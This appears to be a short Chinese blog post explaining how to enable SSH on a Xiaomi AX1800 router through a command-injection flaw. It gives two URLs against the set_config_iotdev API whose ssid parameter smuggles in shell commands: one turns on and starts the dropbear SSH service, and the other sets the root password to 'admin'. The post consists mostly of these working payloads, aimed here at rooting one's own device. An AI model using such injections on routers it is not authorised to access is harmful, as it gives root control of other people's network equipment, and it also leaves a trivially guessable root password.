小米路由开启SSH
小米路由器AX1800还没有开发版的ROM包,官方途径没法开ssh
不过可以通过注入漏洞开启,步骤如下:
首先打开路由器后台,输入管理密码登录,浏览器会显示一串URL,其中有stok参数:
http://192.168.10.254/cgi-bin/luci/;stok=c667bcb8e801338080d19fb2d83c4d93/web/home#router
拿ip和stok参数拼接URL贴到浏览器地址栏访问:
开启SSH:
http://192.168.10.254/cgi-bin/luci/;stok=c667bcb8e801338080d19fb2d83c4d93/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
修改root密码为admin
http://192.168.10.254/cgi-bin/luci/;stok=c667bcb8e801338080d19fb2d83c4d93/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
浙公网安备 33010602011771号